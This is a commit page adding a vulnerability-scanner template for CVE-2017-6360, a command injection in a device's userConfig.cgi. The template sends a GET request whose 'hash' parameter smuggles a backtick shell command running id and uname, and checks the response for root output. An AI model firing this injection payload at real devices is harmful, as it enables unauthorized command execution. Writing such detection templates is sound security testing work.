Merge pull request #227 from harsh-bothra/patch-10

Create CVE-2017-6360.yaml
patch-1
bauthard 2020-07-10 14:22:40 +05:30 committed by GitHub
commit ee41cc2b3d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

22
cves/CVE-2017-6360.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2017-6360
info:
name: Command Injection in userConfig.cgi cloudPersonalSmtp 'hash'
author: Harsh Bothra
severity: Critical
# source:- https://www.exploit-db.com/exploits/41842
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
machers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "uid=0("